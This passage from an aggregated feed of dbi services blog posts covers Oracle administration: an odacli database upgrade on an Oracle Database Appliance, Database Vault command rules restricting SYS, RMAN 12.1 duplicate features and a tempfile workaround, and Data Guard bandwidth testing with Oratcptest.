de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.1.0.2             false      OLTP     odb2     ASM        Updating     520167d7-59c8-4732-80a6-cc32ef745cec

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 10a2a304-4e8e-4b82-acdc-e4c0aa8b21be

Job details
----------------------------------------------------------------
ID:  10a2a304-4e8e-4b82-acdc-e4c0aa8b21be
Description:  Database service upgrade with db ids: [24821a48-7474-4a8b-8f36-afca399b6def]
Status:  Running
Created:  February 19, 2018 6:36:17 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 6:36:17 PM CET    February 19, 2018 6:36:17 PM CET    Success
Database Upgrade                                   February 19, 2018 6:36:17 PM CET    February 19, 2018 6:58:05 PM CET    Success

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d

su - oracle
. oraenv <<< ODAWS12
oracle@oda-dbi01:/home/oracle/ # sqlplus / as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Mon Feb 19 18:59:08 2018
Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name, version from v$instance;

INSTANCE_NAME     VERSION
---------------- -----------------
ODAWS12      12.2.0.1.0

SQL> sho parameter spfile

NAME               TYPE       VALUE
------------------ ---------- ---------------------------------------------
spfile             string     +DATA/ODAWS12/PARAMETERFILE/spfileodaws12.ora

It also worked fine with an 12.1 database: and it also took about 20 minutes for an empty database.

You may have noticed that it’s possible to upgrade several databases in the same time by providing multiple database id. Not sure if you would do that in real life :-)

upgrade-database is also available on ODA that are still using oakcli (nowadays only virtualized ODA I think), but as oakcli has no repository, database id has to be replaced by database name,  and db home id by the name registered in classic oraInventory, for example:

oakcli upgrade database -db ODAWS11 -to OraDb12201_home1

 

This great feature will not revolutionize your DBA life, but it should help to upgrade your database with minimum effort.

 

Cet article One command database upgrade on ODA est apparu en premier sur Blog dbi services.

Database Vault : Rules, Rule Sets and Command Rules

$
0
0

In a previous blog I talked about protecting data using Realms. With Database Vault we can also protect our database against some SQL statements. These statements can include SELECT, ALTER SYSTEM, database definition language (DDL), and data manipulation language (DML) statements.
We can do this with Command Rules. In this blog I am demonstrating how we can use a Command Rule to prevent SYS from creating a new pluggable database in a multitenant environment.

Before starting the demonstration, we can see that there are some predefined Command Rules which apply to all users.

SQL> show user
USER is "C##DBV_OWNER_ROOT"
SQL> show con_name

CON_NAME
------------------------------
PDB1
SQL> SELECT COMMAND, RULE_SET_NAME FROM DVSYS.DBA_DV_COMMAND_RULE;

COMMAND              RULE_SET_NAME
-------------------- --------------------------------------------------
ALTER PROFILE        Can Maintain Accounts/Profiles
ALTER SYSTEM         Allow Fine Grained Control of System Parameters
ALTER USER           Can Maintain Own Account
CHANGE PASSWORD      Can Maintain Own Account
CREATE PROFILE       Can Maintain Accounts/Profiles
CREATE USER          Can Maintain Accounts/Profiles
DROP PROFILE         Can Maintain Accounts/Profiles
DROP USER            Can Maintain Accounts/Profiles

8 rows selected.
SQL>

Because of these default Command Rules, for example, user sys cannot create a user once Database Vault is enabled.

SQL> conn sys/root@pdb1 as sysdba
Connected.
SQL> create user myuser identified by test;
create user myuser identified by test
                                 *
ERROR at line 1:
ORA-01031: insufficient privileges

To grant a user the ability to use these commands, you can grant the user the role that the rule set checks.

SQL> SELECT PRIVILEGE FROM DBA_SYS_PRIVS WHERE GRANTEE = 'DV_ACCTMGR';

PRIVILEGE
----------------------------------------
DROP PROFILE
ALTER PROFILE
ALTER USER
CREATE PROFILE
CREATE USER
CREATE SESSION
DROP USER

7 rows selected.

SQL>

To allow sys to create a user we can grant the DV_ACCTMGR role to SYS

SQL> show user
USER is "C##DBV_ACCTMGR_ROOT"

SQL> show con_name

CON_NAME
------------------------------
PDB1
SQL>

SQL> grant  DV_ACCTMGR to sys;

Grant succeeded.

And now SYS can create a user

SQL> conn sys/root@pdb1 as sysdba
Connected.
SQL> create user myuser identified by test;

User created.

SQL>

Before starting the demonstration let’s verify that user SYS, by default, can create a pluggable database

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT
SQL> create pluggable database PDB2 ADMIN USER pdb2adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB2';

Pluggable database created.

SQL>

To prevent sys from creating a pluggable database, we are first going to create a RULE. This rule will determine when the command rule will be fired.

SQL> exec DVSYS.DBMS_MACADM.CREATE_RULE(rule_name => 'MY_PDB_RULE', 
                                        rule_expr => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') != ''SYS''');

PL/SQL procedure successfully completed.

SQL>

After we have to create a RULE SET which is a collection of one or more rules. We can associate a rule set with a realm authorization, factor assignment, command rule, or secure application role.

SQL> exec DVSYS.DBMS_MACADM.CREATE_RULE_SET(rule_set_name => 'MY_PDB_RULESET', 
                                            description => ' About managing Pdbs', 
                                            enabled => DBMS_MACUTL.G_YES, eval_options => DBMS_MACUTL.G_RULESET_EVAL_ANY,
                                            audit_options => DBMS_MACUTL.G_RULESET_AUDIT_FAIL + DBMS_MACUTL.G_RULESET_AUDIT_SUCCESS, 
                                            fail_options => DBMS_MACUTL.G_RULESET_FAIL_SILENT, fail_message => '', 
                                            fail_code => '', 
                                            handler_options => DBMS_MACUTL.G_RULESET_HANDLER_OFF, 
                                            handler => '',
                                            is_static => FALSE);

PL/SQL procedure successfully completed.
SQL>

We then add the RULE to the RULE SET

BEGIN
DVSYS.DBMS_MACADM.ADD_RULE_TO_RULE_SET(
                                       rule_set_name => 'MY_PDB_RULESET',
                                       rule_name => 'MY_PDB_RULE');
END;
   /

PL/SQL procedure successfully completed.

And finally create a COMMAND RULE which will prevent SYS to execute a CREATE PLUGGABLE DATABASE statement

SQL> exec DVSYS.DBMS_MACADM.CREATE_COMMAND_RULE(command=> 'CREATE PLUGGABLE DATABASE', 
                                                rule_set_name => 'MY_PDB_RULESET', 
                                                object_owner => DBMS_ASSERT.ENQUOTE_NAME('%',FALSE), 
                                                object_name => '%',
                                                enabled => 'Y');

PL/SQL procedure successfully completed.

SQL>

And now if we try to create a Pdb with SYS

SQL> show user
USER is "SYS"
SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT
SQL>  CREATE PLUGGABLE DATABASE PDB3 ADMIN USER pdb3adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB3';
 CREATE PLUGGABLE DATABASE PDB3 ADMIN USER pdb3adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB3'
*
ERROR at line 1:
ORA-47400: Command Rule violation for CREATE PLUGGABLE DATABASE on PDB3

SQL>
 

Cet article Database Vault : Rules, Rule Sets and Command Rules est apparu en premier sur Blog dbi services.

New features and known issues with RMAN tool on Oracle database 12.1.0.2

$
0
0

Oracle Database 12c has new enhancements and additions in Recovery Manager (RMAN).
The RMAN tool continues to enhance and extend the reliability, efficiency, and availability of Oracle Database Backup and Recovery.
Below, I will mention couple of new features for the RMAN duplicate command, but also how to avoid issues that can happen on the creation of the temporary files.

FEATURES:

<INFO>Using BACKUPSET clause :

In previous releases, active duplicates were performed using implicit image copy backups, transferred directly to the destination server. From 12.1 it is also possible to perform active duplicates using backup sets by including the USING BACKUPSET clause.
Compared to the other method (image copy backups), the unused block compression associated with a backup set reduces the amount of the data pulled across the network.

<INFO>Using SECTION SIZE clause:

The section size clause takes into account the parallel degree and the size of the datafile that will be used.
In my case I have configured the parallel degree to 6:

RMAN> CONFIGURE DEVICE TYPE DISK PARALLELISM 6 BACKUP TYPE TO BACKUPSET;

new RMAN configuration parameters:
CONFIGURE DEVICE TYPE DISK PARALLELISM 6 BACKUP TYPE TO BACKUPSET;
new RMAN configuration parameters are successfully stored

Starting restore at 19-JUL-2018 14:11:06
using channel ORA_AUX_DISK_1
using channel ORA_AUX_DISK_2
using channel ORA_AUX_DISK_3
using channel ORA_AUX_DISK_4
using channel ORA_AUX_DISK_5
using channel ORA_AUX_DISK_6
channel ORA_AUX_DISK_3: using network backup set from service PROD2_SITE1
channel ORA_AUX_DISK_3: specifying datafile(s) to restore from backup set
channel ORA_AUX_DISK_3: restoring datafile 00005 to /u02/oradata/PROD/data.dbf
channel ORA_AUX_DISK_3: restoring section 2 of 7

------
channel ORA_AUX_DISK_2: starting datafile backup set restore
channel ORA_AUX_DISK_2: using network backup set from service PROD2_SITE1
channel ORA_AUX_DISK_2: specifying datafile(s) to restore from backup set
channel ORA_AUX_DISK_2: restoring datafile 00005 to /u02/oradata/PROD/data.dbf
channel ORA_AUX_DISK_2: restoring section 7 of 7

ISSUES :
<WARN>Duplicating on 12cR1, creation of the temp files is not handled correctly.
Duplicating from active or from backup, using Oracle 12cR1, you can run into some issues with the temporary files.

oracle@dbisrv02:/u01/app/oracle/product/12.1.0/dbhome_1/dbs/ [PROD] rman target sys/pwd00@<TNS_NAME_TARGET> auxiliary sys/pwd00@<TNS_NAME_AUXILIARY> 
Recovery Manager: Release 12.1.0.2.0 - Production on Thu Jul 19 13:31:20 2018

Copyright (c) 1982, 2014, Oracle and/or its affiliates.  All rights reserved.

connected to target database: <TNS_NAME_TARGET> (DBID=xxxxxxxxxx)
connected to auxiliary database: <TNS_NAME_AUXILIARY> (not mounted)

duplicate target database to <TNS_NAME_AUXILIARY> from active database using backupset section size 500m;

----------------------------------------
contents of Memory Script:
{
   Alter clone database open resetlogs;
}
executing Memory Script

database opened
Finished Duplicate Db at 19-JUL-2018 14:26:09

<INFO>Querying the v$tempfile will not reveal any error

SQL> select file#,name,status from v$tempfile;

     FILE# NAME                           STATUS
---------- ------------------------------ -------
         1 /u02/oradata/<AUXILIARY>/temp01.dbf   ONLINE

<INFO>But querying the dba_temp_files, or run some transactions against your database that need usage of the temporary tablespace, you will got :

SQL> select * from dba_temp_files;
select * from dba_temp_files
              *
ERROR at line 1:
ORA-01187: cannot read from file  because it failed verification tests
ORA-01110: data file 201: '/u02/oradata/<AUXILIARY>/temp01.dbf'

Solution1 : Drop and recreate your temporary tablespace(s) manually. Could be difficult if you have several of them, OR
Solution2 : Drop temp files from your <to_be_cloned_DB>, on the OS side, before launching the duplicate. For more details you can consult this note from MOS :  2250889.1

SQL> col TABLESPACE_NAME format a50;
SQL> col file_name format a50;
SQL> select file_name,TABLESPACE_NAME from dba_temp_files;

FILE_NAME                                          TABLESPACE_NAME
-------------------------------------------------- --------------------------------------------------
/u02/oradata/<AUXILIARY>/temp01.dbf                       TEMP

SQL>startup nomount;

rm -rf /u02/oradata/<AUXILIARY>/temp01.dbf

 

oracle@dbisrv02:/u01/app/oracle/product/12.1.0/dbhome_1/dbs/ [PROD] rman target sys/pwd00@<TNS_NAME_TARGET> auxiliary sys/pwd00@<TNS_NAME_AUXILIARY> 
Recovery Manager: Release 12.1.0.2.0 - Production on Thu Jul 19 13:31:20 2018

Copyright (c) 1982, 2014, Oracle and/or its affiliates.  All rights reserved.

connected to target database: <TNS_NAME_TARGET> (DBID=xxxxxxxxxx)
connected to auxiliary database: <TNS_NAME_AUXILIARY> (not mounted)

duplicate target database to <TNS_NAME_AUXILIARY> from active database using backupset section size 500m;

At then end of the duplicate action, you should be able to use the database without any action performed against temp files :

SQL> select file#,name,status from v$tempfile;

     FILE# NAME                           STATUS
---------- ------------------------------ -------
         1 /u02/oradata/<AUXILIARY>/temp01.dbf   ONLINE

Additionally, if you are running your auxiliary DB using the Oracle Grid Infra, you need to remove it from Grid during your actions and add again once you finished.

SQL> alter system set db_unique_name='PROD_SITE2' scope=spfile;
alter system set db_unique_name='PROD_SITE2' scope=spfile
*
ERROR at line 1:
ORA-32017: failure in updating SPFILE
ORA-65500: could not modify DB_UNIQUE_NAME, resource exists

--remove from GRID
[grid@dbisrv02 ~]$ srvctl stop database -d PROD
[grid@dbisrv02 ~]$ srvctl remove database -d PROD
Remove the database PROD? (y/[n]) Y

SQL> startup
ORACLE instance started.

Total System Global Area  788529152 bytes
Fixed Size                  2929352 bytes
Variable Size             314576184 bytes
Database Buffers          465567744 bytes
Redo Buffers                5455872 bytes
Database mounted.
Database opened.

SQL> alter system set db_unique_name='PROD_SITE2' scope=spfile;

System altered.
 

Cet article New features and known issues with RMAN tool on Oracle database 12.1.0.2 est apparu en premier sur Blog dbi services.

Using Oratcptest

$
0
0

Last day I did some tests with Oratcptest. This a command line tool which can be used to measure network bandwidth and network latency between client and server.
In this blog I am going to show how to use this tool in a DataGuard environment.
I am using a DataGuard environment with following configuration.


Configuration - PROD

  Protection Mode: MaxAvailability
  Members:
  PROD_SITE1 - Primary database
    PROD_SITE2 - Physical standby database
    PROD_SITE3 - Physical standby database

Fast-Start Failover: DISABLED

Configuration Status:
SUCCESS   (status updated 54 seconds ago)

DGMGRL> show database 'PROD_SITE1' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL> show database 'PROD_SITE2' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL> show database 'PROD_SITE3' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL>

The installation of Oratcptest is very simple. We just have to download on both servers the oratcptest.jar file from the oracle support site. Note that JRE 6 or higher is required. In my case I have JRE 8 on both servers

[oracle@primaserver oratcptest]$ java -version
openjdk version "1.8.0_111"
OpenJDK Runtime Environment (build 1.8.0_111-b15)
OpenJDK 64-Bit Server VM (build 25.111-b15, mixed mode)
[oracle@primaserver oratcptest]$

[oracle@standserver1 oratcptest]$ java -version
openjdk version "1.8.0_181"
OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
[oracle@standserver1 oratcptest]$

[oracle@standserver2 ~]$ java -version
openjdk version "1.8.0_181"
OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
[oracle@standserver2 ~]$

We can invoke the help command to see all options available for the oratcptest

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar -help

Now we can assess the network bandwidth for our DataGuard. Note that I am using simple virtual machines. But the steps will be the same on real productions servers.
We first have to determine the highest volume of redo log in my database. Following Oracle query can be used.

select thread#,sequence#,blocks*block_size/1024/1024 MB,(next_time-first_time)*86400 sec, blocks*block_size/1024/1024/((next_time-first_time)*86400) "MB/s" from v$archived_log where ((next_time-first_time)*864000) and first_time between  to_date('2018/08/09 08:00:00','YYYY/MM/DD HH24:MI:SS') and to_date('2018/08/09 11:00:00','YYYY/MM/DD HH24:MI:SS') and dest_id=2 order by first_time;

   THREAD#  SEQUENCE#         MB        SEC       MB/s
---------- ---------- ---------- ---------- ----------
         1        124 .003417969          9 .000379774
         1        125 .271972656        184 .001478112
         1        126 .001953125          5 .000390625
         1        127 11.3662109        915 .012422088
         1        128 10.8466797       6353 .001707332

We can see that the highest value is .012422088 MB/s. The goal is to see if our network bandwidth can support this rate.
As we are using SYNC mode, the primary database will wait for a confirmation from standby databases that they have written the change to disk before informing the application of the commit success.
For SYNC transport we then have to collect the Average redo write size which is calculated using following formula

Average=redo size / redo writes

These metrics can be obtained using an AWR report. In our case the value is

Average=15924844/4015=3967

Now we are going to simulate SYNC writes over the network using Oratcptest. Note I need the location of my standby redo logs

SQL> select member from v$logfile where type='STANDBY';

MEMBER
--------------------------------------------------------------------------------
/u01/app/oracle/oradata/PROD/stredo01.log
/u01/app/oracle/oradata/PROD/stredo02.log
/u01/app/oracle/oradata/PROD/stredo03.log
/u01/app/oracle/oradata/PROD/stredo04.log

From the standby server I can run following command

[oracle@standserver1 oratcptest]$ java -jar oratcptest.jar -server -port=5555 -file=/u01/app/oracle/oradata/PROD/myoratcp.tmp
OraTcpTest server started.

From the primary server

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar standserver1 -port=5555  -write  -mode=sync -length=3967 -duration=10s -interval=2s
[Requesting a test]
        Message payload        = 3967 bytes
        Payload content type   = RANDOM
        Delay between messages = NO
        Number of connections  = 1
        Socket send buffer     = (system default)
        Transport mode         = SYNC
        Disk write             = YES
        Statistics interval    = 2 seconds
        Test duration          = 10 seconds
        Test frequency         = NO
        Network Timeout        = NO
        (1 Mbyte = 1024x1024 bytes)

(14:26:16) The server is ready.
                    Throughput             Latency
(14:26:18)      1.124 Mbytes/s            3.375 ms   (disk-write 2.537 ms)
(14:26:20)      0.813 Mbytes/s            4.668 ms   (disk-write 3.775 ms)
(14:26:22)      1.094 Mbytes/s            3.467 ms   (disk-write 2.773 ms)
(14:26:24)      1.004 Mbytes/s            3.778 ms   (disk-write 2.991 ms)
(14:26:26)      0.560 Mbytes/s            6.779 ms   (disk-write 5.623 ms)
(14:26:26) Test finished.
               Socket send buffer = 11700 bytes
                  Avg. throughput = 0.920 Mbytes/s
                     Avg. latency = 4.126 ms (disk-write 3.280 ms)

[oracle@primaserver oratcptest]$

We can see that the Average throughput is 0.920 M/s which is sufficient to handle our highest peak rate which is .012422088 MB/s. We can also note the latency which includes the time to send the message to the server host, the optional disk write at the server host, and the acknowledgment back to the client process
If we are using ASYNC mode the test will be like

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar standserver1 -port=5555    -mode=async -length=3967 -duration=10s -interval=2s
[Requesting a test]
        Message payload        = 3967 bytes
        Payload content type   = RANDOM
        Delay between messages = NO
        Number of connections  = 1
        Socket send buffer     = (system default)
        Transport mode         = ASYNC
        Disk write             = NO
        Statistics interval    = 2 seconds
        Test duration          = 10 seconds
        Test frequency         = NO
        Network Timeout        = NO
        (1 Mbyte = 1024x1024 bytes)

(14:58:03) The server is ready.
                    Throughput
(14:58:05)     13.897 Mbytes/s
(14:58:09)      5.193 Mbytes/s
(14:58:11)     40.007 Mbytes/s
(14:58:13)     21.475 Mbytes/s
(14:58:13) Test finished.
               Socket send buffer = 210600 bytes
                  Avg. throughput = 16.901 Mbytes/s

[oracle@primaserver oratcptest]$

Conclusion
In this blog we have talked about Oratcptest which is a simple tool which can help to assess our network bandwidth. Oratcptest can help before performing Rman Backups, file copies, a DataGuard environment.
Reference : Oracle Doc ID 2064368.1

 

Cet article Using Oratcptest est apparu en premier sur Blog dbi services.

Viewing all 190 articles
Browse latest View live